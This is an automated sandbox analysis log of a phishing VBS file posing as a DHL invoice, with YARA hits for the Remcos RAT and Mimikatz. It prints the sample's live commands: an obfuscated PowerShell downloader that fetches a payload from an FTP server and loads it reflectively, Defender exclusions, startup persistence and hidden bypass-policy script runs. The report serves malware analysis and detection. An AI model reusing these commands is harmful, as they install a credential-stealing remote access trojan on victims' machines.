                    Source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 1800, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 1928, type: MEMORYSTR | Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 1928, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR | Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: classification engine | Classification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winVBS@61/45@6/5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,29_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,23_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,31_2_00410DE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,29_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,23_2_0040F4AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,23_2_0041B539
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,23_2_0041AADB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x11.ps1
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3872:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\shietgtst-DDGG2A
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmrxwny3.fc5.ps1
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSystem information queried: HandleInformation
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: AddInProcess32.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: AddInProcess32.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: AddInProcess32.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: AddInProcess32.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: AddInProcess32.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: AddInProcess32.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' 
+ [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [ch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x22.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ajvsujdnntiralmilkxwkxswwkf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\lladutngjbaekramcnkpuknfxzxbri"
